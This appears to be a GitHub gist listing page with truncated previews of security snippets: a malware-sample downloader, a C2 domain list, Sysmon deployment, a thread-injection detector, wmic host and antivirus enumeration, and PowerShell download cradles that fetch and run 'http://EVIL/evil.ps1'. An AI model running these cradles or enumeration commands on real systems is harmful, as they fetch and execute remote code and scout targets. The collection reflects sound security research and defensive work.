This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Bash script to download Malware Bazaar based on tag | |
# Define tag and number of samples to download | |
TAG=insert-malware-bazaar-tag | |
DOWNLOAD_LIMIT=100 | |
# Determin OS | |
OS=$(uname -s) | |
# Download hash values from tag, save the SHA256 hashes |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# C2 FQDNs | |
first seen fqdn | |
2019-12-11 23:37:10 updatemanagir.us | |
2019-12-20 17:51:05 cmdupdatewin.com | |
2019-12-26 18:03:27 scrservallinst.info | |
2020-01-10 00:33:57 winsystemupdate.com | |
2020-01-11 23:16:41 jomamba.best | |
2020-01-13 05:13:43 updatewinlsass.com | |
2020-01-16 11:38:53 winsysteminfo.com | |
2020-01-20 05:58:17 livecheckpointsrs.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
:: Author: Ryan Watson | |
:: Twitter: @gentlemanwatson | |
:: Version: 1.0 | |
:: Credits: Credit to Syspanda.com and their Sysmon GPO article for the kick off point | |
:: https://www.syspanda.com/index.php/2017/02/28/deploying-sysmon-through-gpo/ | |
:: ** IMPORTANT ** | |
:: 1) Create a Sysmon folder with the SYSVOL share on your domain controller | |
:: 2) Download Sysmon from Microsoft and place both sysmon.exe and sysmon64.exe in |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import zipfile | |
import io | |
import sys | |
import os, imp | |
import base64 | |
import threading | |
moduleRepo = {} | |
_meta_cache = {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Host Enumeration: | |
--- OS Specifics --- | |
wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
wmic computersystem LIST full | |
--- Anti-Virus --- | |
wmic /namespace:\\root\securitycenter2 path antivirusproduct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine | |
# This is how I upload my new Sol Trader builds (http://soltrader.net) | |
# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash | |
S3KEY="my aws key" | |
S3SECRET="my aws secret" # pass these in | |
function putS3 | |
{ | |
path=$1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
"""Simple HTTP Server With Upload. | |
This module builds on BaseHTTPServer by implementing the standard GET | |
and HEAD requests in a fairly straightforward manner. | |
""" |